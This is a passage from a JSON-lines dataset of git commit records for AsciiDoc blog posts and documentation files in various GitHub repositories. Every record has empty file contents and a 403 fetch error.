2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d72a8f8026b606ebd9793932bbc679c5feb59d93","subject":"[DOCS] Add ML geographic functions (elastic\/x-pack-elasticsearch#1357)","message":"[DOCS] Add ML geographic functions (elastic\/x-pack-elasticsearch#1357)\n\n* [DOCS] Add ML geographic functions\r\n\r\n* [DOCS] Add script_fields info to ML geo functions\r\n\r\n* [DOCS] Remove summary count from ML geographic functions\r\n\r\n* [DOCS] Added example title to geographic functions\r\n\r\n* [DOCS] Remove list from ML geographic functions\r\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@a8e495657fbbe794434f6baa572e3777707d6b58\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/ml\/functions\/geo.asciidoc","new_file":"docs\/en\/ml\/functions\/geo.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef2f6fffc99343cdf3b4445bc94834d6090fc061","subject":"y2b create post If You're Seeing This It's Too Late...","message":"y2b create post If You're Seeing This It's Too Late...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-28-If-Youre-Seeing-This-Its-Too-Late.adoc","new_file":"_posts\/2017-07-28-If-Youre-Seeing-This-Its-Too-Late.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9a5de7ce9dc351f79717e42d71197f37f508f6c","subject":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","message":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"674e63c7210aee2291b89853eb6bd5955ba7516a","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 
2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b53b22b15f983551c4db20dcae17ec889ee1655","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d44f12fd0995846c2353abd7ff989182d3a5056","subject":"Update 2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","message":"Update 2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","new_file":"_posts\/2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51776a11ffc1e1d4c0ab8cdd40732f03bdfe4d39","subject":"y2b create post These Fidget Things Have Gone Too Far...","message":"y2b create post These Fidget Things Have Gone Too Far...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-17-These-Fidget-Things-Have-Gone-Too-Far.adoc","new_file":"_posts\/2017-06-17-These-Fidget-Things-Have-Gone-Too-Far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25511c00ed501151a4b78f211e0fcf3b4c03fd46","subject":"y2b create post They Say It's The Fastest In The World...","message":"y2b create post They Say It's The Fastest In The World...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-11-They-Say-Its-The-Fastest-In-The-World.adoc","new_file":"_posts\/2017-10-11-They-Say-Its-The-Fastest-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"35bed97780774015ed1fbe45cd83a654c5adbb08","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ad18edc20fd175fa85f6ebdbd04e1ef550f653f","subject":"y2b create post Razer Mamba 2012 Elite Wireless Gaming Mouse Unboxing \\u0026 Overview","message":"y2b create post Razer Mamba 2012 Elite Wireless Gaming Mouse Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-15-Razer-Mamba-2012-Elite-Wireless-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-07-15-Razer-Mamba-2012-Elite-Wireless-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939942eb158fec2f4a6dfa191adbdd3757accb9d","subject":"#243 add readme for forwading to documentation","message":"#243 add readme for forwading to documentation\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bef624eaf1bb27ccad779d6bc224543945a0661","subject":"Update 2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","message":"Update 2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","new_file":"_posts\/2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b3e1c51c9282118f9f70d0949f1a4e7795b1e80","subject":"Update 2015-02-18-Hello-World.adoc","message":"Update 2015-02-18-Hello-World.adoc","repos":"haxiomic\/haxiomic.github.io,haxiomic\/haxiomic.github.io,haxiomic\/haxiomic.github.io","old_file":"_posts\/2015-02-18-Hello-World.adoc","new_file":"_posts\/2015-02-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/haxiomic\/haxiomic.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d07927f11cdbd08ee341f99e6f365642efc7fe8e","subject":"Update 2016-01-18-md5-cracker.adoc","message":"Update 
2016-01-18-md5-cracker.adoc","repos":"buchedan\/buchedan.github.io,buchedan\/buchedan.github.io,buchedan\/buchedan.github.io","old_file":"_posts\/2016-01-18-md5-cracker.adoc","new_file":"_posts\/2016-01-18-md5-cracker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buchedan\/buchedan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3fcc0befcc34007a3904fd3507dbc6b67c2fb8","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49f30cd7cfb1a472b64e470e6088c6a130768296","subject":"y2b create post Casio G-Shock GD-100-1BDR Unboxing \\u0026 Overview + Close Ups!","message":"y2b create post Casio G-Shock GD-100-1BDR Unboxing \\u0026 Overview + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-19-Casio-GShock-GD1001BDR-Unboxing-u0026-Overview--Close-Ups.adoc","new_file":"_posts\/2011-01-19-Casio-GShock-GD1001BDR-Unboxing-u0026-Overview--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40d383782b098dd56971a92d12f41f36fd5bebd4","subject":"EST-1571: adds some analysis notes","message":"EST-1571: adds some analysis notes\n","repos":"estatio\/estatio,estatio\/estatio,estatio\/estatio,estatio\/estatio","old_file":"adocs\/documentation\/src\/main\/asciidoc\/scenarios-linking-orders-and-invoices.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/scenarios-linking-orders-and-invoices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/estatio\/estatio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a96f079062d11207cdd15868b6fc8a155b82ae56","subject":"[DOC] Add section on PySpark","message":"[DOC] Add section on PySpark\n","repos":"xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a01e8152dc968ec5d3bcd0e3da7ce4f85e70683","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 
2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa57752bfffea07a089de33023712e16ccd0685","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d955fd5a9b534be669c1fa10571a55f82aaac00","subject":"Update 2015-05-06-Interview-after-Greach-2015-Conference.adoc","message":"Update 2015-05-06-Interview-after-Greach-2015-Conference.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-06-Interview-after-Greach-2015-Conference.adoc","new_file":"_posts\/2015-05-06-Interview-after-Greach-2015-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b25a14da654085c10fe30601609595b15570d683","subject":"Replace wiki links with vaadin.github.io\/spring-tutorial","message":"Replace wiki links with vaadin.github.io\/spring-tutorial\n","repos":"mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/IBGettingStartedWithVaadinSpringWithoutSpringBoot.asciidoc","new_file":"documentation\/articles\/IBGettingStartedWithVaadinSpringWithoutSpringBoot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"105fd5c7853fac4f4b4c902abba77c63ad84371f","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 
2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26deb44162e439453ca621cd4fd9be57600f4254","subject":"Moved to new blender folder.","message":"Moved to new blender folder.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_gltf.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_gltf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"7961e1750658ed8c2c3a7da8cf8885b2cc1fee32","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86938343c96bdbee9615a8c0abed1e015dbc74a8","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82538427cf25a924ff090ff9be75c0dd5cb21eeb","subject":"IGNITE-13674 Add documentation for Native Persistence Defragmentation feature (#8465)","message":"IGNITE-13674 Add documentation for Native Persistence Defragmentation feature 
(#8465)\n\n","repos":"chandresh-pancholi\/ignite,NSAmelchev\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,NSAmelchev\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,apache\/ignite,ascherbakoff\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,ascherbakoff\/ignite,xtern\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,ascherbakoff\/ignite,apache\/ignite,apache\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,NSAmelchev\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,ascherbakoff\/ignite,ascherbakoff\/ignite,xtern\/ignite,xtern\/ignite,ascherbakoff\/ignite,apache\/ignite,apache\/ignite,apache\/ignite","old_file":"docs\/_docs\/persistence\/native-persistence-defragmentation.adoc","new_file":"docs\/_docs\/persistence\/native-persistence-defragmentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtern\/ignite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5babe05b51cf11bd448e5fba850e04a1f8841c9b","subject":"Update 2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","message":"Update 2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","new_file":"_posts\/2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fb12e4f1a06a775a19f64a610a0203b710e8acf","subject":"Update 2016-05-28-Zero-effort-A-P-I-client.adoc","message":"Update 2016-05-28-Zero-effort-A-P-I-client.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-28-Zero-effort-A-P-I-client.adoc","new_file":"_posts\/2016-05-28-Zero-effort-A-P-I-client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70482e7a8f580c87b74f057dd251247de17e9b96","subject":"y2b create post A Drone's Worst Nightmare...","message":"y2b create post A Drone's Worst Nightmare...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-01-A-Drones-Worst-Nightmare.adoc","new_file":"_posts\/2017-02-01-A-Drones-Worst-Nightmare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0025724b5040e1c8355ebb4761489604b64fb32c","subject":"Update 2017-07-27-Acemice-Belki-Hadsizce-5.adoc","message":"Update 
2017-07-27-Acemice-Belki-Hadsizce-5.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-07-27-Acemice-Belki-Hadsizce-5.adoc","new_file":"_posts\/2017-07-27-Acemice-Belki-Hadsizce-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae84861596d905c484c5a737887928ecd98ee5a","subject":"Python - Generting cookie secret for web framework","message":"Python - Generting cookie secret for web framework\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"26cc7bf91bd111259fef9366c2293eadc56c2e7f","subject":"added a readme","message":"added a readme\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"07988871421fd082c3499308a167e0fe50177512","subject":"Fixed project requirements","message":"Fixed project requirements\n\nLinks were updated and version information was dropped in order to\nspecify the bare minimum requirements and reduce situations where the\ndocumentation might not always be up-to-date with the *exact* version\nbeing used.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc6acc3c41ce89551844cd906d3f2f7886eddc7a","subject":"Updated Readme","message":"Updated Readme\n","repos":"chlewe\/strawpoll,chlewe\/strawpoll","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chlewe\/strawpoll.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51d6f98dccb6064e6b8a8d3dfb34f081dac40c84","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af0221cc8aac58c7f6b4dcc1a794c1926afbab5","subject":"Update 2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","message":"Update 
2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","repos":"melix\/hubpress,melix\/hubpress,melix\/hubpress,melix\/hubpress","old_file":"_posts\/2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","new_file":"_posts\/2016-06-17-Gradle-30-M2-brings-Java-9-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/melix\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a33ed3df443061ab9f2aa6fb659d8d577154f1b","subject":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa94952b684eb9dcb4e92d1c3e013c0f2f8e9885","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 